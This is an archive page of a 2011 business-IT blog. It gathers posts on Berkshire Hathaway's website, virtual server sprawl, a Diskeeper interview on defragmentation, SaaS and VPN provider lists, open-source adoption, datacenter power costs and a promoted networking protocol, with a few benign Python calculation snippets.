Archives for: June 2011

An Open Letter To Warren Buffett: Please Fix Your Ugly Web Site

Berkshire Hathaway is one of the most successful companies in the world. As of this article’s publication, its stock is trading at $115,540.00 per share. That’s enough to buy 60 houses in Michigan.

It’s no wonder that the company’s CEO – Warren Buffett – has been listed as the 3rd richest man in the world (just slightly ahead of me).

So you’d think that an organization like this would have the resources to put up a killer web site, or at least spend $30 on a nice template. Unfortunately, BerkshireHathaway.com looks more like an old Geocities homepage than a corporate online presence.

So I recently asked a number of Enterprise Features readers to give their input into what design changes they’d recommend for the Berkshire Hathaway web site. Here’s what they had to say.

Dotty from Premium Web Sites

This website needs an initial design!  I would find out the target market (not very clear on the site) and come up with a pleasing design for that market.  Also, the site needs more information – not just links.  Who is this site speaking to?  Let’s get it optimized for whoever that is, with better and more content.  Get some social interaction and possibly user-generated content to liven up the site.

Dylan Valade from Pine Lake Design

Here is my idea for what the BH homepage should look like.

Philip Morgan from Positive Revolution

Berkshire Hathaway needs a Positivity Section. This is where they can categorize their companies’ positive attributes such as social giving, fund raising and all the positive initiatives that take place within their organizations.

Samuel Hartman from The Nail That Sticks Up

Here’s what I’d do:

  • Update DNS servers so that berkshirehathaway.com works without the “www.” (currently it does not)
  • Fold existing site data into a content management system such as WordPress or Joomla
  • Remove archaic language such as “about our WEB page”
  • In general, make the site as larger-than-life as Warren himself. Its current layout reflects the style of webpages from the ’90s.

Although this article takes some playful jabs, I want to make it clear that I personally have the utmost respect for Mr. Buffett, and I hope he takes this in the good humor with which it was intended.

Most Common Problems Associated with Virtual Server Sprawl

Installing a new physical server is a long process.  First, you have to make decisions regarding which equipment you’re going to buy and which vendors will supply it.  Then, you need to allow time for order processing and shipping.  Then, you need to go through the whole process of allocating rack space, setting up the network wiring, and connecting the power.  This whole process can easily take three or four weeks.

With virtualized systems, all you have to do is click a button.

For this reason, it can be very tempting for IT administrators to install all sorts of new systems… whether they need them or not.  This type of “virtual server sprawl” is different from physical server sprawl in many ways, but the challenges are just as serious.

With physical server sprawl, you have to worry about things such as power consumption, datacenter real estate, maintenance and upgrades, etc…  But with virtualized server sprawl, you now have to worry about orphaned systems eating up precious system resources, wasting expensive software licenses, and creating additional administrative and management headaches for the IT department.

One of the issues that makes virtual server sprawl extra challenging is that it’s easier to add a new server than it is to take one away.  It’s a bit like being stuck in quicksand.  Every time you reach down to pull a leg out, you sink further in.

Once you’ve allocated resources to a server that wasn’t needed, it can be very difficult to get those resources back.  This is especially true in environments that have many (100 or more) virtualized servers in use.

  • When killing off a server that you believed to be orphaned, how can you be absolutely sure that you’re not accidentally taking an essential service offline?
  • How much is this virtual server sprawl costing you in terms of licensing and resources?
  • How can you identify an under-used server in such a way that it can be isolated?  And how do you measure its utilization to ensure that it is, in fact, being under-utilized?  (A rough sketch of this kind of check appears after this list.)
  • Because of the complications involved, removing an unnecessary virtual server might require significant IT time.  Many orphaned servers are benign and cost very little to operate. How do you measure the wastefulness of an under-used server so that the cost of removing it doesn’t end up being higher than the cost of simply leaving it in place?
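
As a rough illustration of the utilization questions above, here is a minimal sketch that flags candidate virtual machines from exported monitoring data. The CSV layout, column names, and thresholds are illustrative assumptions, not the output of any particular hypervisor or monitoring product.

```python
# Minimal sketch: flag potentially under-used VMs from exported metrics.
# Assumes a CSV export (vm_name, avg_cpu_pct, avg_net_kbps, last_login_days)
# produced by whatever monitoring tool you already run -- the column names
# and thresholds here are illustrative assumptions, not a vendor API.
import csv

CPU_THRESHOLD_PCT = 5.0      # sustained average CPU below this is suspicious
NET_THRESHOLD_KBPS = 10.0    # near-zero network traffic
IDLE_DAYS_THRESHOLD = 90     # nobody has logged in for ~3 months

def find_sprawl_candidates(path):
    candidates = []
    with open(path, newline="") as f:
        for row in csv.DictReader(f):
            cpu = float(row["avg_cpu_pct"])
            net = float(row["avg_net_kbps"])
            idle = int(row["last_login_days"])
            if cpu < CPU_THRESHOLD_PCT and net < NET_THRESHOLD_KBPS and idle > IDLE_DAYS_THRESHOLD:
                candidates.append(row["vm_name"])
    return candidates

if __name__ == "__main__":
    for vm in find_sprawl_candidates("vm_metrics.csv"):
        print(f"Review before decommissioning: {vm}")
```

A list like this is only a starting point; each flagged server still needs an owner’s sign-off (the first question above) before anything is switched off.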

The way I see it, the problem of virtual server sprawl is not something that can simply be solved by spending more on hardware.  Because of the exponential growth curve associated with these types of problems, the best solution is to take a high level, strategic approach.

You need to start from the very beginning, and build your IT strategy on a sound foundation that takes these problems into consideration.  Being smarter and more objective about the criteria required to justify a new virtual server implementation will help eliminate many of these more expensive problems down the road.

The Biggest Disk Defragmentation Myths

Founded in 1981, Diskeeper Corporation is the technology innovator in performance and reliability technologies. The company’s products make computer systems faster, more reliable, longer lived and energy efficient, all with zero overhead.

Inventors of the first automatic defragmentation in 1986, Diskeeper pioneered a new breakthrough technology in 2009 that actually prevents fragmentation.

Diskeeper’s family of products are relied upon by more than 90% of Fortune 500 companies and more than 67% of The Forbes Global 100, as well as thousands of enterprises, government agencies, independent software vendors (ISVs), original equipment manufacturers (OEMs) and home offices worldwide.

Today, I’ll be interviewing Colleen Toumayan from Diskeeper.

What is disk defragmentation, and why is it important?

The weakest link in computer performance is the hard disk. It is at least 100,000 times slower than RAM and over 2 million times slower than the CPU. In terms of computer performance, the hard disk is the primary bottleneck. File fragmentation directly affects the access and write speed of that hard disk, steadily degrading computer performance to unviable levels. Because all computers suffer from fragmentation, this is a critical issue to resolve.

What is fragmentation?

Fragmentation, by definition, means “the state of being fragmented,” or “something is broken into parts that are detached, isolated or incomplete.” Fragmentation is essentially little bits of data or information that are spread over a large disk area causing your hard drive to work harder and slower than it has to just to read a single file, thus affecting overall computer performance.

Imagine if you had a piece of paper and you tore it up into a 100 small pieces and threw it up in the air like confetti. Now imagine having to collect each of those pieces and put them back together again just to read the document. That is fragmentation.

Disk fragmentation is a natural occurrence and is constantly accumulating each and every time you use your computer. In fact, the more you use your PC, the more fragmentation builds up, and over time your PC is liable to experience random crashes, freeze-ups and eventually the inability to boot up at all. Sound familiar? And you thought you needed a new PC.

That is fragmentation, and it is what happens to the data on your hard drive every time you save a file. The question is simple: why defrag your hard drive after the fact, when you can prevent the majority of fragmentation in the first place?

By intelligently writing files to the disk without fragmentation, your hard drive read/write heads can then read a file that is all lined up side by side in one location, rather than jumping to multiple spots just to access a single file.

Just like shopping, if you have to go to multiple stores to get what you want, it simply takes longer. By curing and preventing the fragmentation up front, and then instantly defragging the rest, you experience a whole new level of computer performance, speed and efficiency.

Fragmentation can take two forms: file fragmentation and free space fragmentation.

“File fragmentation causes performance problems when reading files, while free space fragmentation causes performance problems when creating and extending files.” In addition, fragmentation also opens the door to a host of reliability issues. Having just a few key files fragmented can lead to an unstable system and errors.

Problems caused by fragmentation include:

System Reliability:

  • Crashes and system hangs
  • File corruption and data loss
  • Boot up failures
  • Aborted backup due to lengthy backup times
  • Errors in and conflict between applications
  • Hard drive failures
  • Compromised data security

Performance:

  • System slowdowns and performance degradation
  • Slow boot up times
  • Increase in the time for each I/O operation or generation of unnecessary I/O activity
  • Inefficient disk caching
  • Slowdown in read and write for files
  • High level of disk thrashing (the constant writing and rewriting of small amounts of data)
  • Slow backup times
  • Long virus scan times
  • Unnecessary I/O activity on SQL servers or slow SQL queries

Longevity, Power Usage, Virtualization and SSD:

  • Accelerated wear of hard drive components
  • Wasted energy costs
  • Slower system performance and increased I/O overhead due to disk fragmentation compounded by server virtualization
  • Write performance degradations on SSDs due to free space fragmentation

Why do operating systems need to break files up and spread their contents across so many places? Why doesn’t it just optimize when writing the file?

Files are stored on a disk in smaller logical containers, called clusters. Because files can radically vary in size, a great deal of space on a disk would be wasted with larger clusters (a small file stored in a large cluster would consume only a fraction of the available cluster space). Thus clusters are generally (and by default) fairly small. As a result, a single medium-sized or large file can be stored in hundreds (or even tens of thousands) of clusters.
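
To put rough numbers on that trade-off, here is a back-of-the-envelope calculation. The 4 KB cluster size is just an assumption (a common NTFS default), and the file sizes are made up for illustration.

```python
# Back-of-the-envelope cluster math (4 KB clusters assumed, a common NTFS default).
CLUSTER = 4 * 1024                      # bytes per cluster

def clusters_needed(file_bytes):
    return -(-file_bytes // CLUSTER)    # ceiling division

small_file = 600                        # a 600-byte file...
print(clusters_needed(small_file))      # ...still occupies 1 whole cluster
print(CLUSTER - small_file)             # ~3.4 KB of that cluster is wasted ("slack")

large_file = 200 * 1024 * 1024          # a 200 MB file...
print(clusters_needed(large_file))      # ...spans 51,200 clusters, any of which can
                                        # end up scattered across the disk
```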

The logic which fuels the native Windows Operating System’s file placement is hardly ideal. While it has made some advances in recent years, a Windows user at any level of engagement (home notebook all the way up to enterprise workstation) is faced with an ever-increasing level of file fragmentation.

This is largely attributable to a lack of consolidated free space as well as pre-existing fragmentation (essentially: fragmentation begets fragmentation). The OS will try to place a file as conveniently as possible.

If a 300MB file is being written, and the largest available contiguous free space is 150MB, 150MB of that file (or close to it) will be written there. This process is then repeated with the remainder… 150MB of file left to write, 75MB free space extent, write… 75MB of file left to write, 10MB free space extent, write… and so on, until the file is fully written to the disk. The OS is fine with this arrangement, because it has an index which maps out where every portion of the file is located… but the speed at which the file could optimally be read is now vastly degraded.

As an extra consideration, that write process takes considerably longer than if there had simply been 300MB of contiguous free space available to drop the file into.
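
To make the splitting easier to picture, here is a toy simulation of that greedy write pattern. The free-space extents below are invented numbers chosen to mirror the example above; real allocators are more sophisticated, so treat this purely as an illustration.

```python
# Toy illustration of the greedy write pattern described above:
# the file is dropped into the largest free-space extents available,
# one piece at a time, until nothing is left to write.
def greedy_write(file_mb, free_extents_mb):
    fragments = []
    remaining = file_mb
    for extent in sorted(free_extents_mb, reverse=True):
        if remaining <= 0:
            break
        piece = min(extent, remaining)
        fragments.append(piece)
        remaining -= piece
    if remaining > 0:
        raise RuntimeError("not enough free space for the file")
    return fragments

# Numbers mirror the example in the text: a 300 MB file written into
# progressively smaller free-space extents.
pieces = greedy_write(300, [150, 75, 40, 20, 10, 5, 5, 5])
print(pieces)        # [150, 75, 40, 20, 10, 5] -> the file lands in 6 fragments
print(len(pieces))   # each fragment is an extra seek when the file is read back
```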

If Windows already has a free disk defragmentation utility, why should I pay money for another one?

  1. Incomplete. Can’t get the job done.
  2. Won’t defrag free space.
  3. Resource intensive. Can’t be run when the system is active.
  4. Servers? It can’t keep up with them.
  5. Hangs up on big disks. You never know what the progress is.
  6. Eats up IT admin time administering.
  7. Takes forever. May never finish.
  8. Effects of fragmentation still not eliminated!

Inefficient defragmentation means higher help desk traffic, more energy consumption, shorter hardware life, less time to achieve proactive IT goals, and throughput bottlenecks on key consolidation economies such as virtualization.

What are some of the biggest misconceptions that people have when it comes to disk defragmentation?

Myth #1: The built-in defragmenter that comes with Windows® is good enough for most situations because it can be scheduled.

After-the-fact defrag solutions, including the built-in one, allow precious resources to be wasted by writing fragmented files to the disk. Once a file is written, the defrag engine has to go to work to locate and reposition that file. When that file later expands, this double effort has to repeat itself all over again — this approach remains a reactive band-aid to a never-ending problem. Not even the built-in defrag can keep pace with the constant growth of fragmentation between scheduled defrags. Manual defrags tie up system resources, so users just have to wait … and wait … and wait.

When you are only doing scheduled defrags (or nothing at all), your PC accumulates more and more fragmentation, which leads to PC slowdowns, lags and crashes. This problem cannot be handled with a freebie utility even if it can be “scheduled”. Here’s why:

Systems accumulate fragmentation continually. When the computer is busiest (relied upon the most), the rate of fragmentation is highest. Most people don’t realize how much performance is lost to fragmentation and how fast it can occur. To maintain efficiency at all times, fragmentation must be eliminated instantly as it happens or proactively prevented before it is even able to happen. Only through fragmentation prevention or instant defrag can this be accomplished.

Scheduling requires planning. It’s a nuisance to schedule defrag on one computer, but on multiple PCs it can be a real drain of time and resources. Plus, if your PC isn’t on when the defrag process is scheduled, it will not run until you turn your PC on again. By then, you will need to use your computer and you will experience performance slowdowns while you work – that is, if you are able to work at all.

Scheduled defrag times are often not long enough to get the job done.

Myth #2: Active defragmentation is a resource hog and must be scheduled off production times.

This was very true with regard to manual defragmenters. They had to run at high priority or risk getting continually bounced off the job. In fact, these defragmenters often got very little done unless allowed to take over the computer. When the built-in defragmenter became schedulable, not much changed. The defrag algorithm was slow and resource heavy. Built-in defragmenters were really designed for emergency defragmentation, not as a standard performance tool.

Ever since it was first released in 1994, Diskeeper® performance software has been a “Set It and Forget It”®, schedulable defragmenter that backed off system resources needed by computer operations. Times have changed, and a typical computer’s I/Os per second (IOPS) have accelerated a hundredfold.

Because this drove the rate of fragmentation accumulation way up, Diskeeper Corporation saw the need for a true real-time defragmenter and developed a new technology, InvisiTasking® technology. This innovative breakthrough separates usable system resources into five areas capable of being accessed separately.

As a result, robust, fast defrag can occur even during peak workload times – and even on the busiest and largest mission-critical servers. In the latest version, Diskeeper incorporated a new feature called IntelliWrite® fragmentation prevention technology. This new feature prevents file system fragmentation from ever occurring in the first place.

By preventing up to 85% of fragmentation, rather than eliminating it after the fact, Diskeeper is able to improve system performance much more dynamically and beyond what can be done with just the automatic defragmentation approach.

Myth #3: Fragmentation is not a problem unless more than 20% of the files on the disk are fragmented.

The files most likely to be fragmented are precisely the ones relied upon the most. In reality, these frequently accessed files are likely fragmented into hundreds or even thousands of pieces. And they got that way very quickly. This degree of fragmentation can cost you 90% or more of your computer’s performance when accessing the files you use most. Ever wonder why some Word docs take forever to load? Without fragmentation, they load in a flash. File load times are quicker, and backups, boot-ups and anti-virus scans are significantly faster.

Myth #4: You can wear out your hard drive if you defragment too often.

Exactly the opposite is true. When you eliminate fragmentation you greatly reduce the number of disk accesses needed to bring up a file or write to it. Even with the I/O required to defragment a file, the total I/O is much less than working with a fragmented file.

For example, if you have a file that is fragmented into 50 pieces and you access it twice a day for a week, that’s a total of 700 disk accesses (50 X 2 X 7). Defragmenting the file may cost 100 disk accesses (50 reads + 50 writes), but thereafter only one disk access will be required to use the file. That’s 14 disk accesses over the course of a week (2 X 7), plus 100 for the defrag process = 114 total. 700 accesses for the fragmented file versus 114 for the defragged file is quite a difference. But in a real world scenario, this difference would be multiplied hundreds of times for a true picture of performance gain.
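
For readers who want to check the math, the snippet below simply restates the figures from that example.

```python
# Reproducing the disk-access arithmetic from the example above.
fragments = 50          # file split into 50 pieces
uses_per_day = 2
days = 7

fragmented_io = fragments * uses_per_day * days        # 50 * 2 * 7 = 700 accesses
defrag_cost   = fragments * 2                          # 50 reads + 50 writes = 100
defragged_io  = defrag_cost + 1 * uses_per_day * days  # 100 + 14 = 114 accesses

print(fragmented_io, defragged_io)   # 700 vs. 114 over one week
```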

With the release of Diskeeper 2011, we are tracking how many I/Os Diskeeper helps save your system, making it even easier to gauge the benefits of running Diskeeper on your computer.

In addition to proactively curing and preventing fragmentation, Diskeeper 2011 also now defaults to an optimized defragmentation method (for the fragments that were not prevented) to maximize efficiency and performance while minimizing disk I/O by prioritizing which files, folders and free space should be defragmented. This setting can be changed to a more thorough defragmentation option from the Defragmentation Options tab in the Configuration Properties for those who wish to do so.

How has disk defragmentation changed over recent years? What trends are going to change it in the future?

With new storage technologies such as SAN and virtualization, defragmentation has changed to address their specific peculiarities.  We have a specific product for virtualization, V-locity, that goes well beyond defrag, and we also have a SAN edition of Diskeeper 2011.  I am sure cloud will bring new technologies as well.

What should people look for when shopping around for disk defragmentation programs?

They will want one that prevents fragmentation before it even happens, one that has technology to instantly handle any fragmentation that cannot be prevented, one that is efficient and able to really target the fragmentation that is impeding system performance, one that has zero system resource conflict, and one that is specially designed with new storage technologies in mind.

Top 10 SaaS Software Providers In Every Category For July 2011

Top 10 SaaS Customer Relationship Management (CRM)

  1. Commence CRM
  2. NetSuite
  3. CLP Suite
  4. Appshore
  5. SageCRM.com
  6. Infusion Software
  7. Microsoft Dynamics
  8. eGain
  9. Salesboom
  10. SofFront

Top 10 Hosted Exchange Providers

  1. NetNation
  2. Hostirian
  3. Apptix
  4. Exchange My Mail
  5. Kerio Mail Hosting
  6. Apps4Rent
  7. MyOfficePlace
  8. SherWeb
  9. Evacloud
  10. FuseMail

Top 10 SaaS Invoicing Software Services

  1. BillingBoss
  2. CashBoard
  3. LessAccounting
  4. Intuit Billing Manager
  5. CurdBee
  6. SimplyBill
  7. FreshBooks
  8. BlinkSale
  9. Bamboo Invoice
  10. Zoho Invoicing

Top 10 Managed Web Hosting and Dedicated Servers

  1. Rackspace
  2. AYKsolutions
  3. Hostgator
  4. aplus.net
  5. KnownHost
  6. The Planet
  7. FIREHOST
  8. ServInt
  9. MegaNetServe
  10. Limestone Networks

Top 10 Online Backup Services For Servers

  1. Zetta
  2. CoreVault
  3. Zmanda
  4. Backup-Technology
  5. Novosoft Remote Backup
  6. CrashPlan
  7. LiveVault
  8. SecurStore
  9. DSCorp.net
  10. AmeriVault

Top 10 Web Analytics Services

  1. WordStream
  2. Extron
  3. Woopra
  4. At Internet
  5. Logaholic
  6. MetaSun
  7. AdvancedWebStats
  8. GetClicky
  9. Piwik
  10. OneStat

Top 10 Virtual Private Network Providers (VPN)

  1. Cyberghost VPN
  2. Always VPN
  3. Black Logic
  4. Pure VPN
  5. DataPoint
  6. Golden Frog
  7. Strong VPN
  8. Anonymizer
  9. VPN Tunnel
  10. Personal VPN

Top 10 SaaS Accounting and Bookkeeping Software Providers

  1. Netsuite
  2. NolaPro
  3. Xero
  4. Clear Books
  5. Accounts Portal
  6. Yendo
  7. Merchant’s Mirror
  8. Envision Accounting
  9. Skyclerk
  10. Wave Accounting

Top 10 SaaS Online Payroll Software Providers

  1. Evetan
  2. Simple Payroll
  3. Paycor
  4. WebPayroll
  5. Triton HR
  6. Amcheck
  7. Patriot Software
  8. Perfect Software
  9. Compupay
  10. Paylocity

Why Are Companies So Reluctant To Implement Open-Source?

My firm promotes open source and free programs as much as possible.  Why are the platforms that we install for our clients and the programs we recommend controversial?  After all, our systems are extremely stable and very low-cost.  We deliver exactly what is needed without wasted resources.  Our on-site time is extremely low and all of our hosted services are high-security, so why would anyone complain?

After extensive discussions with a lot of people who make a living providing IT services to small business owners, the common denominator among all of the detractors was (I hate to say it) incompetence and greed.

If a company is going to promote open-source, that company really needs to know their tech, and be fully competent.

Some examples:

Microsoft consultant at a networking meeting:  Him:  “I am so bored.  Oh boy!  I get to restore another server!  Boring!”  Me:  “Why don’t you get into open source?”  Him:  “No money in it.”

IT consultant trying to get us to give him business:  Samba servers don’t work in a corporate environment.  You have to set them up perfectly in order for them to be stable. (Computer tech is binary – yes/no; off/on; works/doesn’t work.  Shades of gray belong to the Humanities fields, not Technical fields.  All servers need to be set up perfectly; there is no “almost right” in computer science).

IT skills are beyond the knowledge-base of most small business owners; they hire IT consultants to provide the necessary skill set.  An unfortunate outcome is that many small business owners are deluded into believing that a crashed server, non-functioning software or slow systems are a normal part of doing business.

A tech must be highly trained to perfectly set up a closed source server, and the current business environment often demands that the consultant is licensed in the closed source software.  Unfortunately, the licensing for a Microsoft Certified Systems Engineer (MCSE) is attained by passing a computerized, multiple-choice test.  The answers can be memorized, since the questions and answers are available on the Internet.  As we all know, the ability to memorize has nothing to do with the ability to apply.  A closed source program is a program that does not reveal the code used to create it. This means that whatever flaws exist in the programming are outside of the tech’s ability to handle.

A professional or company promoting the use of open source is a completely different equation.  Techs using open source are almost always self-trained, not only in the software they are installing on the SMB system, but in multiple open source fields.  This is indicative of an intellect that is not only highly disciplined, but has an active interest in new challenges.  Open source technology is a continuously changing field and the ability to self-train is mandatory.  If the open source technology is not fully understood, the end result will be failure.  The bottom line: a company promoting open source knows the technology they are using, inside and out.  The code used to create the programs being promoted is available to the tech, which gives more facility for customization and advanced implementation.

Software bugs in a closed source program are the sole responsibility of the company selling the software.  Whether or not/when those bugs will be fixed depends solely on the interest of the software company who owns the code and the time and abilities of the programmers working for the software owners.

Bugs in an open source program are addressed by a huge open source field consisting of individuals dedicated to an open exchange of code, fixes and ideas.  Whereas a closed source system can only be repaired by the limited number of techs working for that system, open source bugs are continuously being addressed by thousands of programmers from all over the world.

Cost:

Microsoft’s model is based on “closed source”:  The consumer buys a product or the product is included as part of the software loaded into a new computer.  To make that product fully functional, the consumer must buy more products with large licensing costs.   In order to make the product friendly to users, extra setup steps are added in for techs servicing the system, which boils down to more time spent working on setup.  If a small business owner is paying a consultant by the hour, the rates go up.  Even if the system is set up perfectly, expenses pile onto expenses.

Open source is not free financially, but it does not have as many licensing fees for the software itself.  Fees paid for open source are usually for customization, support, hosting and maintenance.  The majority of open source programs for sale on the market offer two versions: with or without support.  In either case, the code used to build the program is accessible.

There are needs for both in the industry.  Microsoft’s Active Directory is a very good system for managing authentication and security and can work well in a Linux environment.  Conversely, most open source programs run well on most Microsoft operating systems.

Some open source applications are not controversial.  The Apache Software Foundation provides the open source web server software that is used on the majority of web servers.  Microsoft’s IIS (Internet Information Services) web server has a fraction of this market.

Perhaps the best way to view this field is to realize that there is a standard:  Microsoft and all of its various programs.  Opposing that are people who consider that the standard is not good enough and freely donate their time toward the creation of something better, something more stable, something that is driven by a truly enthusiastic group of idealists who are not concerned as much by the dollar value as they are with the joy of creating something totally workable.

Our company’s business model is based on having many clients with stable systems in place, using our subscription services (as opposed to buying their own hardware) and rarely needing our support services.  To that end, we sell blocks of hours.  Many of our clients only need a block of hours once every 6 months.  Others only need us when they expand.  Just as a note: we have cut our clients’ IT bills drastically when taking over their IT services; the result is that many of our clients have more cash flow, allowing them to expand more rapidly.

About The Authors: Cedric Halbach, President, Daniel Lawson, Technical Director, Susan Risdal, Admin Director. Enterprise Technology Services, LLC is a highly-experienced Information Technology firm, serving the needs of small businesses in New Jersey and New York.

Your Help Needed In The Battle for Control over the Internet – #killswitch

I’ve recently become aware of a new film project that could have a profound impact when it comes to raising mainstream awareness of digital access, censorship, net neutrality and privacy rights. I’m posting this here in hopes that we can attract attention to this project, and get these filmmakers the support they need to get their message out.

Picture a world where everything that you read, see, and hear is controlled by one corporation.  Imagine that this corporation had the power to track everything that you do, censor your favorite websites, throttle your blog, and use propaganda to gain influence over your life.

This nightmare scenario is rapidly becoming a reality.

In the year 2011, the vast majority of television, radio, movie studios, and newspapers are owned by just a handful of corporations.  These same media conglomerates are currently merging to take over our Internet and achieve total control.

This is the story of David v. Goliath.  These media conglomerates have the money, politicians, lobbyists, television stations, and production studios; while we have the people.

Will the integrity of your democratic internet be saved? Or will dissent be choked off, as a few multi-national corporations hijack our Internet and achieve total control?

Educator and writer Chris Dollar is teaming with filmmakers Ali Akbarzadeh and Jeff Horn of Akorn Entertainment in making #killswitch, the first full length documentary to take an in depth look at the battle for control over the Internet.

Learn how you can become involved in this important documentary film by viewing the five minute trailer:

ATTENTION CEOs: Get Your IT Department Their Own Electric Bill

No, I’m serious.

What would you do if I told you that you were paying as much as $600 per year in energy bills for each server in your datacenter… and that 25% of your servers probably don’t even need to be there?

The current priorities for IT departments… aside from new strategic projects… are security and uptime.

Power consumption is simply not a priority because IT is not responsible for paying the electric bills. Your datacenter could be bleeding money through the power sockets… and you wouldn’t even know it.

This is also a great opportunity for IT managers who are feeling the squeeze of IT budget constraints.  Once empowered with this information about corporate IT costs, they can take action to minimize energy consumption so that the cost savings can be applied to other areas of IT.

And there’s really a lot that they can do, including:

  • Power management
  • Server consolidation
  • Installing more efficient power supplies
  • Upgrading to energy-efficient hardware
  • Etc…

A watt here and a watt there can make a big difference in IT costs.  And there’s also a multiplier effect when you consider that each watt saved in power consumption also generally equals about a watt saved in cooling costs. (Your savings double.)
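
For a rough sense of scale, the back-of-the-envelope calculation below lands near the $600-per-server figure mentioned earlier. The wattage, electricity rate, and cooling multiplier are assumptions chosen only to make the arithmetic concrete; plug in your own numbers.

```python
# Rough annual energy cost per server (all inputs are illustrative assumptions).
WATTS_PER_SERVER = 500        # average draw of one server
RATE_PER_KWH = 0.07           # electricity rate in dollars
COOLING_MULTIPLIER = 2.0      # ~1 watt of cooling for every watt of IT load

hours_per_year = 24 * 365
kwh = WATTS_PER_SERVER / 1000 * hours_per_year          # ~4,380 kWh
annual_cost = kwh * RATE_PER_KWH * COOLING_MULTIPLIER   # ~$613 per server per year

print(round(annual_cost, 2))
# If 25% of 100 servers are idle, that's roughly 25 * annual_cost wasted each year.
```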

But before this can become a priority, you need to establish a sense of urgency.  Contact your utilities company and ask them about splitting the electrical billing in such a way that the power usage of the IT department is billed completely separately from the rest of the company.

This will help put things into perspective… and allow you to set specific, actionable goals that enable your company to save money while also helping the planet.

Top 17 Virtual Private Network Providers and VPN Services

With the sudden recent growth in the adoption of mobile computing and wireless networking, companies need to be extra-aggressive when it comes to securing the online interactions of their employees.

This means there is an increased need to hide their online profiles, and encrypt their data transmissions. All it takes is one nosy hacker in an airport, hotel or coffee shop to land your company in serious trouble.

So make sure that all of your employees are protected online, using a secure Virtual Private Network service. Below, I’ve included a list of the top names in the VPN market.

  1. VPN Authority
    Unrestricted use, low price and access to international content. Everything you could want from a Virtual Private Network.
  2. Small Business VPN
    They don’t just give you access to your data. They give you access to your business.
  3. Hide My Ass
    The great anonymizing service with the funny name. Try their free web proxy, or upgrade to their full-featured VPN.
  4. Cyberghost VPN
    A European VPN service that offers free accounts.
  5. Hotspot VPN
    Hotspot VPN was created as a secure solution to the fear that currently surrounds wireless computing.
  6. Pure VPN
    A secure and fast tunneling service that hides your private interactions and protects you online.
  7. DataPoint
    A VPN service that’s provided from a full-service IT support company.
  8. Golden Frog
    A secure connection that follows you when you travel and helps you minimize the online fingerprints you leave behind.
  9. Strong VPN
    A great VPN at a great time, with many years of experience behind them.
  10. Anonymizer
    Twenty percent of online consumers will become the victims of a privacy breach. And Anonymizer wants to put an end to this.
  11. Always VPN
    Their service encrypts your online interactions to prevent eavesdropping, while also helping to bypass nasty filters.
  12. Black Logic
    They offer an unmetered Virtual Private Network service for only one hundred dollars per year.
  13. VPN Tunnel
    An encrypted and secure VPN service that does not store any traffic logs.
  14. Personal VPN
    A VPN service that’s designed around the needs of privacy-minded individuals.
  15. Cartish Technologies
    A small independent VPN provider, serving the state of Texas.
  16. Super VPN
    A super safe, super practical online protection service that serves the Canadian market.
  17. Tulip
    The leading data services provider in serving the Indian enterprise market. Offering many services, including Virtual Private Networks.

The Q: An Open-Source Technology That Promises To Make Routers Obsolete And End The Net Neutrality Debate

“The Q.” is a breakthrough network technology that resolves network bottlenecks by applying broadcasting economies to broadband communications. Like original TV and radio, The Q. enables a theoretically unlimited number of users to share the network with extremely low overhead at all times.

The current broadband situation calls for modems and routers to address the fundamental design flaw in the original broadcast Ethernet. The problem with these network devices, however, is that they can use more than 50% of the available bandwidth just to manage the whole system, while not supporting broadcast services once they are in place.  As the number of users on the network increases, performance plummets.  Anyone who has attended a conference with lots of Wi-Fi devices has experienced the backside of the bell curve where connections become very slow.  By replacing the legacy protocol with a high performance medium access control (MAC), and flashing the router chips to convert them into hubs, we give networks an architecture that more closely resembles a cable TV network controlled by DOCSIS modems (set top box) at the edge with passive hubs in the middle of the network.

The Q. uses a family of protocols called Distributed Queue Switch Architecture (DQSA). This bottleneck-eliminating technology provides near-perfect performance and stable Quality of Service (QoS) under all conditions.  DQSA is simply a better way to run almost any kind of network at layer 2, the layer that provides access to physical and wireless mediums. In practical terms, this means that additional users can be added to the network without additional overhead, just as a broadcast television station does not worry that additional televisions are receiving its signal, allowing for one-to-one, one-to-many, or one-to-all communications for the price of a single transmission.

This unique solution can be immediately applied to high data rate Body Area Networks (BAN) in healthcare and the military, as well as supporting advances in multi-antenna mesh networks that will lead to ensemble computing.  Ensembles are like clouds on steroids, because the cloud architecture will no longer be relegated to the data center but will extend across the entire network, which will solve a big part of today’s security problem.  Ultimately this provides a painless migration path to future network architectures, including the Internet, where old devices will still work, and where we can reduce the global data center footprint for redundant and mirrored servers, saving approximately 3% of our national electric bill.

Currently, redundant or mirrored servers must be geographically dispersed in different time zones in order to serve requests. Backup and physical vulnerability considerations aside, an upgrade with The Q. in the data center would allow us to do for expensive network hardware what open source Linux did to commoditize the server market.  However, when implemented on our old telephony synchronous plant, we could give data center server clusters the ability to serve the world’s requests from a single location by serving popular content on a channel before it is even requested, with a theoretically unlimited number of channels.

With traditional networks, users compete for the channel with actual payload data – which is like several big parties walking into a busy restaurant at the same time.  Now imagine everyone getting back into their cars to circle around the block only to pull up to valet and try again.  It’s a lot of wasted time and energy. The only time one can experience a collision on The Q. is in the reservation request itself, and this small 4% possibility of contention is always resolved quickly by a reservation system that runs in the background of the payload data, which never slows down.

This is how The Q. combines the best features of private line circuit switching with the economy of shared line packet switching.  In fact, The Q. can sustain 110% network saturation before experiencing any throughput degradation, resulting in greater than 95% throughput efficiency, and wireless throughput at greater than 85%.  Ultimately, this efficiency will enable the new TV White Space carriers to provide unified broadband networks for the price of a regular telephone line, giving the public a high quality media experience for much less than cable or satellite, plus voice and data.

With The Q., traditional carriers will lower capital expenditures too, allowing them to build out access mesh networks that will be more reliable because they will scale to infinite proportions.  Connectivity will be more reliable because of multiple links, and access points will have extended reach because of hopping.  These topologies have never been seen in mass-market applications, but the implication of scalable mesh is that we may end up needing very little or no carrier infrastructure at all.  This could also create thousands of public broadband utilities which would link together to create a national first responders/emergency response network.  This could also be a major source of revenue for municipalities that would build these networks, by selling broadband to local constituents for the price of a regular phone line.  Another implication is that telephony privacy laws could extend to broadband communications once served by a public utility, making these laws important again.

Low-level network engineers and network operators are encouraged to join the open source group EcoNode (Ether2 Community Network Operators & Developers) on LinkedIn, or follow the technology at http://vator.tv/company/ether2-1 or on Twitter @ether2theQ.

CoreVault Launches New VMware vCloud Powered Hosting Service

Flexible Consolidation of Data Security and Built-in Backup and Data Protection

CoreVault, an industry leader in providing data protection services, today announced the availability of its new VMware vCloud® Powered Hosting service. Through its partnership with VMware, CoreVault has developed its Cloud Hosting service to take advantage of all the cost and efficiency benefits of cloud computing, without sacrificing the control of information security.

